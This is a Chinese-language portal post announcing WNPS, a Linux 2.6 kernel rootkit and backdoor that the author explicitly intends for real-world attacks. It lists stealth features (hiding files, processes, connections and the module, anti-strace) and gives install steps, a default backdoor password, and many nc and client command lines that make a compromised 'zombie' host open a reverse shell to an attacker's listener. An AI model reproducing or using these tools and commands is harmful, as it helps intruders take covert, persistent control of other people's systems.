WNPS功能简介-红联Linux系统门户

过一个多月的开发，WNPS这只2.6下的rookit+backdoor程序马上就要跟大家见面了，先简单介绍一下它的功能和用法，大家也可以提一些功能需求，我将尽力补上：
WNPS 简介：
WNPS是一只工作在x86 2.6.x内核下的rootkit+backdoor程序。
它的意思是wnps is not poc shell，我的意图在于将它设计成一个可用于实战的linux rootkit。
wnps的技术不求最新颖，但是一定要实用。它最初的想法来自enyelkm，我对作者的开源精神深表感激。
测试内核版本：
2.6.9-5.EL
+----------------------------------------------------------------------------------------+
WNPS 功能特点：
1.隐藏指定文件，隐藏文件中特定的内容，目录，进程,动态网络连接,自身模块，保护模块，进程，文件
不被strace。
2.内核反弹后门
3.模块注射
+----------------------------------------------------------------------------------------+
WNPS 用法：
服务端使用说明：
############在安装之前，请先修改wnps目录下的config.h#############
TCP_SHELL_KEY 表示要发送的主机密码，默认为@wztshell
HIDE_FILE 表示我们将隐藏以HIDE_FILE字符为前缀的文件
HIDE_TASK 表示我们将隐藏以HIDE_TASK字符为前缀的进程
HIDE_STR 表示我们将隐藏在文件中以HIDE_STR字符为前缀的字符串
HIDE_OPEN 表示我们将隐藏文件中位于HIDE_OPEN和HIDE_CLOSE之间的内容
HIDE_CLOSE
安装：
make;make install
+----------------------------------------------------------------------------------------+
客户端使用说明：
WNPS的客户端将被设计成可以工作在linux和win平台上使用。
1。即可以发送tcp数据报来激活shell，又能用nc来连接服务器的某一端口来发送密码，以及
反弹ip和port。
2。使用方法简单灵活
1).在windows平台下，可以用nc作为客户端，连接肉鸡任意开放的一个端口。
比如：
./nc -vvlp 8899
./nc -vv target_ip 22 然后输入密码,反弹ip和port.即可在8899端口获得一个shell。
(1).在本机的8899端口获得一个远程shell。
@wztshell:8899

(2).在192.168.75.128的5566端口获得一个远程shell。
@wztshell:192.168.75.128:5566

2).在linux平台下，即可用nc作为客户端，又可采用自带的client作为客户端，并且允许发送
tcp数据报来激活远程shell。

./client
optinons:
-tcp [victim port] [connect back ip] [connect back port]
-listen [port]

-listen 在本地监听某一端口

-tcp 发送tcp数据报，激活远程shell
为远程服务器地址，必须填写这个参数。
[victim port] 为远程服务器开放的端口，默认将会自动扫描常用开放的端口，在send.h里定义。
[connect back ip] 为你要反弹回的主机地址，默认是本机公网ip地址，必须是可以让肉鸡能够回连的地址。
[connect back port] 为你要反弹回的主机端口，默认为8899，在config.h里定义。

+----------------------------------------------------------------------------+
你可以很灵活的来使用WNPS的client。client默认的监听端口为8899，在client/config.h中设置
###########将/client/config.h中的DEFAULT_INTERFACE换成主机中被绑定的公网ip的网络接口###########

设肉鸡ip为：192.168.75.130
注意：如果是要在client端所在的主机上获得远程shell，无须使用-listen选项！

(1).在本机的8899端口上获得一个远程shell。
./client -tcp 192.168.75.130
(2).向肉鸡的22端口发送数据报,然后在本机的8899端口上获得一个远程shell。
./client -tcp 192.168.75.130 22

(3).向肉鸡的22端口发送数据报,然后在本机的5566端口上获得一个远程shell。
./client -tcp 192.168.75.130 22 5566

(4).在192.168.75.128的8899端口上获得一个远程shell。
先在192.168.75.128上使用：
./client -listen

然后在client所在的主机上使用：
./client -tcp 192.168.75.130 192.168.75.128

(5).在192.168.75.128的5566端口上获得一个远程shell。
./client -listen 5566
./client -tcp 192.168.75.130 192.168.75.128 5566

(6).向肉鸡的22端口发送数据报，然后在192.168.75.128的5566端口上获得一个远程shell。
./client -listen 5566
./client -tcp 192.168.75.130 22 192.168.75.128 5566

WNPS功能简介

共有 3 条评论

频道文章

最新教程

随机推荐